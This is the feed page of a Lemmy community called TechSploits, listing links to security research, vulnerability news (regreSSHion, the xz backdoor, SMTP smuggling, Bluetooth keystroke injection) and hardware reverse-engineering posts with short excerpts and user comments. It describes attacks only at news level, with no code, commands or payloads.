![Community banner](https://reddthat.com/pictrs/image/0bd7a4ef-1817-4a4d-bc68-95a1d48f0bd4.jpeg)
![techsploits](https://reddthat.com/pictrs/image/a01ef48c-16ae-4074-b930-1e5c414fc7bc.jpeg?format=webp&thumbnail=48)
TechSploits
- regreSSHion: CVE-2024-6387
Update your openssh, now
- Hacking Millions of Modems (and Investigating Who Hacked My Modem)samcurry.net Hacking Millions of Modems (and Investigating Who Hacked My Modem)
Two years ago, something very strange happened to me while working from my home network. I was exploiting a blind XXE vulnerability that required an external HTTP server to smuggle out files, so I spun up an AWS box and ran a simple Python webserver to receive the traffic from the vulnerable server.
Unbelievable...
- Writing a Unix clone in about a month
Drew always has a hot take about a problem
- Brane Dump: How I Tripped Over the Debian Weak Keys Vulnerability
Recent HN Thread: https://news.ycombinator.com/item?id=39976225
- The xz sshd backdoor rabbithole goes quite a bit deeperthreadreaderapp.com Thread by @bl4sty on Thread Reader App
@bl4sty: the xz sshd backdoor rabbithole goes quite a bit deeper. I was just able to trigger some harder to reach functionality of the backdoor. there's still more to explore.. 1/n it requires sending a properly craf...âŠ
The PoC thickens
- An IRC client in your motherboardaxleos.com An IRC client in your motherboard
I made a graphical IRC client that runs in UEFI. Itâs written in Rust and leverages the GUI toolkit and TrueType renderer that I wrote for axleâs userspace. I was able to develop it thanks to the vmnet network backend that I implemented for QEMU. You can connect to an IRC server, chat and read messa...
UEFI IRC, the perfect companion to asking why your Linux boot partition no longer exists #joke
- xzbot: Notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)github.com GitHub - amlweems/xzbot: notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094) - amlweems/xzbot
- Network tunneling with⊠QEMU?securelist.com Network tunneling with⊠QEMU?
While investigating an incident, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the QEMU hardware emulator.
- Cracking Metaâs Messenger Certificate Pinning on macOStexts.blog Cracking Metaâs Messenger Certificate Pinning on macOS
Bypassing certificate pinning in Metaâs Messenger application on macOS.
- World Server Throwing Championshipwww.cloudfest.com World Server Throwing Championship
The World Server Throwing Championship at CloudFest lets Cloud professionals demonstrate their raw power! Are you strong enough?
- Snake on a Switch [Video]
Video
Click to view this content.
Video link for those on clients who don't show links when they are videos: https://i.imgur.com/5jtvxPQ.mp4
- Ramrecovery: Simple demo illustrating remanence of data in RAM (see Cold boot attack) using a Raspberry Pigithub.com GitHub - anfractuosity/ramrecovery: Simple demo illustrating remanence of data in RAM (see Cold boot attack) using a Raspberry Pi. Loads many images of the Mona Lisa into RAM and recovers after powering off/on again.
Simple demo illustrating remanence of data in RAM (see Cold boot attack) using a Raspberry Pi. Loads many images of the Mona Lisa into RAM and recovers after powering off/on again. - GitHub - anfr...
Practical attacks with a Raspberry Pi.
- DEF CON 30 - Sam Bent - Tor - Darknet Opsec By a Veteran Darknet Vendor
YouTube Video
Click to view this content.
An interesting talk
- How I forked SteamOS for my living room PC
linux_gaming@lemmy.ml
- Interesting double-poly latches inside AMD's vintage LANCE Ethernet chipwww.righto.com Interesting double-poly latches inside AMD's vintage LANCE Ethernet chip
I've studied a lot of chips from the 1970s and 1980s, so I usually know what to expect. But an Ethernet chip from 1982 had something new: a ...
- Operation Triangulation: The last (hardware) mysterysecurelist.com Operation Triangulation: The last (hardware) mystery
Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory. We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.
Pretty scary stuff in here
- [37C3] There oughta be a Game Boy capture cartridge.there.oughta.be There oughta be a Game Boy capture cartridge.
I present to you: The GB Interceptor. It is an adapter that goes between an unmodified Game Boy and the cartridge and offers a video stream of the game via USB. Click the image to see the video on youtube.com. The video above should give you a good overview of what it does, how it works and what its...
> https://github.com/Staacks/gbinterceptor
- [37C3] Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure (PDF)
Abstract
Intelâs Software Guard Extensions (SGX) promises an isolated execution environment, protected from all software running on the machine. As such, numerous works have sought to leverage SGX to provide confidentiality and integrity guarantees for code running in adversarial environments. In the past few years however, SGX has come under heavy fire, threatened by numerous hardware attacks. With Intel repeatedly patching SGX to regain security while consistently launching new (micro)architectures, it is increasingly difficult to track the applicability of various attacks techniques across the SGX design landscape. Thus, in this paper we set out to survey and categorize various SGX attacks, their applicability to different SGX architectures, as well as the information leaked by them. We then set out to explore the effectiveness of SGXâs update mechanisms in preventing attacks on real-world deployments. Here, we study two commercial SGX applications. First, we investigate the SECRET network, an SGX-backed blockchain aiming to provide privacy preserving smart contracts. Next, we also consider PowerDVD, a UHD Blu-Ray Digital Rights Management (DRM) software licensed to play discs on PCs. We show that in both cases vendors are unable to meet security goals originally envisioned for their products, presumably due to SGXâs long update timelines and the complexities of a manual update process. This in turn forces vendors into mak- ing difficult security/usability trade offs, resulting in security compromises.
-----
A worthwhile read for those who don't mind a more technical paper
- [37C3] Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo) · Embrace The Red
Relevant Links:
- https://www.wsj.com/articles/with-ai-hackers-can-simply-talk-computers-into-misbehaving-ad488686
- https://www.wired.com/story/chatgpt-prompt-injection-attack-security/
- [37C3] Predator Files: Technical deep-dive into Intellexa Alliance's surveillance products - Amnesty International Security Labsecuritylab.amnesty.org Predator Files: Technical deep-dive into Intellexa Alliance's surveillance products - Amnesty International Security Lab
An expose the Intellexa Alliance's surveillance capabilities including advanced spyware, mass surveillance platforms, and tactical systems for targeting and intercepting nearby devices.
- Adventures in reverse engineering Broadcom NIC firmware
They are also doing a 37C3 talk on the matter: https://www.devever.net/~hl/ortega-37c3/ortega-37c3-web.pdf
- A data corruption bug in OpenZFS? (Writeup)despairlabs.com A data corruption bug in OpenZFS?
The Thanksgiving long weekend (23-26 November) in 2023 was an interesting one for OpenZFS, that I managed to land myself in the middle of.
This is the write up of the OpenZFS bug. Very interesting and well explained.
- Nissan Australia cyberattack claimed by Akira ransomware gangwww.bleepingcomputer.com Nissan Australia cyberattack claimed by Akira ransomware gang
Today, the Akira ransomware gang claimed that it breached the network of Nissan Australia, the Australian division of Japanese car maker Nissan.
Could be worse. People could own a Nissan.
- Celebrating the first NES Tetris game crashbiggieblog.com Celebrating the first NES Tetris game crash - a blog by biggiemac42
Blue Scuti made history, breaking NES Tetris in a way that was previously only theoretical. Here is a glimpse into the what, who, and how.
Today, the NES Tetris community achieved a new milestone. A player known as âBlue Scutiâ reached level 157, a total of 1510 lines deep into the game, placed a piece, and his game crashed.
This post will describe why that is not only interesting, but a thing to be celebrated.
There will be topics in this post that assume you know everything from my previous post about Tetris. That post has no assumed prior knowledge, so start there and then come back if you want to know more.
- 3,500 arrested, $300M seized in global cybercrime crackdownwww.scmagazine.com 3,500 arrested, $300M seized in global cybercrime crackdown
Operation HAECHI IV, coordinated by Interpol, spanned 34 countries and led to more than 82,000 suspicious bank accounts being frozen.
5 - 6 mins (if you are a slow reader)
Police in 34 countries arrested 3500 people and seized assets worth $300 million in the latest iteration of what has become an annual coordinated global crackdown on cybercrime.
According to Interpol, Operation HAECHI IV ran from July to December and targeted seven types of scams: voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.
As a result of the operation, authorities blocked 82,112 suspicious bank accounts, seizing a total of $199 million in hard currency and a further $101 million worth of virtual assets.
Interpolâs executive director of police services, Stephen Kavanagh, said the âstaggeringâ sum seized was a clear illustration of the incentives that were driving an explosive growth in transnational organized crime.
âThis represents the savings and hard-earned cash of victims,â he said. âThis vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide.â
Interpol said Operation HAECHI IV involved investigators working together to detect online fraud and freeze associated bank and virtual asset service provider accounts using Interpolâs Global Rapid Intervention of Payments (I-GRIP), a stop-payment mechanism which helps countries work together to block criminal proceeds.
Interpol helped frontline officers identify 367 virtual asset accounts linked to transnational organized crime. Assets in those accounts have been frozen as local police continue their investigations. Dragnet pulls in more AI-powered crime
In one case resulting from the operation, Filipino and Korean authorities worked together to apprehend a âhigh-profile online gambling criminalâ who was arrested in Manila after spending two years on the run from Korea's National Police Agency. The illegal gambling operation the man allegedly ran was dismantled.
Interpol published two âpurple noticesâ â warnings about emerging digital investment fraud practices â during the operation.
One alerted police around the world to a new scam detected in Korea involving the sale of non-fungible tokens (NFTs) with promises of huge returns, which turned out to be a ârug pullâ scam where the developers abruptly abandon a project and investors lose their money.
The second purple notice warned about the use of AI and deep fake technology to lend credibility to scams by enabling criminals to hide their identities and to pretend to be a family member, friend, or love interests of the person they are attempting to dupe.
âThe UK leg of the operation reported several cases where AI-generated synthetic content was used to deceive, defraud, harass, and extort victims, particularly through impersonation scams, online sexual blackmail, and investment fraud,â Interpol said.
âCases also involved the impersonation of people known to the victims through voice cloning technology.â
Investment fraud, business email compromise and e-commerce fraud accounted for 75 per cent of cases investigated during the operation. Arrests and seizures keep growing
A similar operation last year, HAECHI III, netted almost 1000 arrests and $130 million in assets.
âHAECHI IVâs 200 per cent surge in arrests shows the persistent challenge of cyber-enabled crime, reminding us to stay alert and keep refining our tactics against online fraud, which is why INTERPOL operations like this are so importantâ Kavanagh said.
The first operation in the series, HAECHI-I, involved police from nine countries in Asia working together between September 2020 and March 2021 to make 585 arrests and seize $83 million.
Interpolâs head of National Central Bureau in Korea, Kim Dong Kwon, praised the international policing effort that led to the increased results achieved by HAECHI IV.
âDespite criminals' endeavors to gain illicit advantages through contemporary trends, they will eventually be apprehended and face due punishment. To accomplish this, Project HAECHI will consistently evolve and expand its scope.â
As SentinalOne explained in a 2021 post about HAECHI-II: in Korea, Haechi is a popular mythical animal widely used as a symbol of justice. The countries participating in this yearâs operation were: Argentina, Australia, Brunei, Cambodia, Cayman Islands, Ghana, India, Indonesia, Ireland, Japan, Kyrgyzstan, Laos, Liechtenstein, Malaysia, Maldives, Mauritius, Nigeria, Pakistan, Philippines, Poland, Korea, Romania, Seychelles, Singapore, Slovenia, South Africa, Spain, Sweden, Thailand, United Arab Emirates, United Kingdom, United States and Vietnam. Hong Kong also participated.
- Beeper - Moving Forwardblog.beeper.com Beeper - Moving Forward
Each time that Beeper Mini goes âdownâ or is made to be unreliable due to interference by Apple, Beeperâs credibility takes a hit. Itâs unsustainable. As much as we want to fight for what we believe is a fantastic product that really should exist, the truth is that we canât win a cat-and-mouse game ...
Who thought that when you integrate with Apple services as a third party you would be blocked đ€
- SMTP Smuggling - Spoofing E-Mails Worldwidesec-consult.com SMTP Smuggling - Spoofing E-Mails Worldwide
Introducing a novel technique for e-mail spoofing
Watchout after 27th to 29th of December when everyone releases the tools/PoCs at 37C3
- Unauthenticated keystroke injection from BT on Android, Linux, macOS/iOS*
Unpatched devices are vulnerable under the following conditions:
- Android devices are vulnerable whenever Bluetooth is enabled
- Linux/BlueZ requires that Bluetooth is discoverable/connectable
- iOS and macOS are vulnerable when Bluetooth is enabled and a Magic Keyboard has been paired with the phone or computer
----
Time to disable Bluetooth on all your old android phones!
- Dutch hacker jailed for extortion, selling stolen data on RaidForumswww.bleepingcomputer.com Dutch hacker jailed for extortion, selling stolen data on RaidForums
A former Dutch cybersecurity professional was sentenced to four years in prison after being found guilty of hacking and blackmailing more than a dozen companies in the Netherlands and worldwide.
- Exploiting DNS response parsing on the Wii Ugaryodernichts.blogspot.com Exploiting DNS response parsing on the Wii U
It's annual Wii U exploit time! đ Image of the Wii U connection test screen on the GamePad. After reverse engineering parts of the Wii Us' ...
Is it DNS? It's always DNS!
PS. I'd recommend their other writeups too! Such as: https://garyodernichts.blogspot.com/2022/06/exploiting-wii-us-usb-descriptor-parsing.html?m=1
- Fixing the Volume on my Bluetooth Earbudsblog.ornx.net Fixing the Volume on my Bluetooth Earbuds
A bit of reverse engineering goes a long way
Now this is some nice reverse engineering
- Oh-Auth - Abusing OAuth to take over millions of accountssalt.security Salt Labs | Oh-Auth - Abusing OAuth to take over millions of accounts
Itâs extremely important to make sure your OAuth implementation is secure. The fix is just one line of code away. We sincerely hope the information shared in our blog post series will help prevent major online breaches and help web service owners better protect their customers and users.